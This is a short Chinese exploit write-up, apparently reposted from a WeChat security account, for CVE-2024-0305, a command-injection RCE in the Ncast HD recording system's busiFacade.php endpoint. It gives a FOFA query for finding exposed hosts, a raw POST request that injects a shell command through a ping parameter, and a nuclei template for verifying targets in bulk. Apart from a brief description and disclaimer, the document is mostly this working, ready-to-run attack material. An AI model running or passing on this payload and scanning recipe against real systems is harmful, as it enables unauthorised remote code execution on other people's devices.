免责声明:
本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
漏洞描述
Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统。该系统/classes/common/busiFacade.php接口存在RCE漏洞。
fofa语句
app="Ncast-产品" && title=="高清智能录播系统"漏洞复现
打开页面
构造payload
POST /classes/common/busiFacade.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 152
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7Dnuclei批量验证
id: Ncat-RCE-CVE-2024-0305
info:
name: Ncast盈可视高清智能录播系统busiFacade RCE漏洞
author: fgz
severity: critical
description: Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统。该系统/classes/common/busiFacade.php接口存在RCE漏洞。
metadata:
max-request: 1
fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
verified: true
http:
- raw:
- |-
POST /classes/common/busiFacade.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 91
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["| echo hello"]}
matchers-condition: and
matchers:
- type: word
part: body
words:
- hello
- type: status
status:
- 200github poc总汇地址:https://github.com/AYcg/poc
原文始发于微信公众号(AY长歌):Ncast-RCE(CVE-2024-0305)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论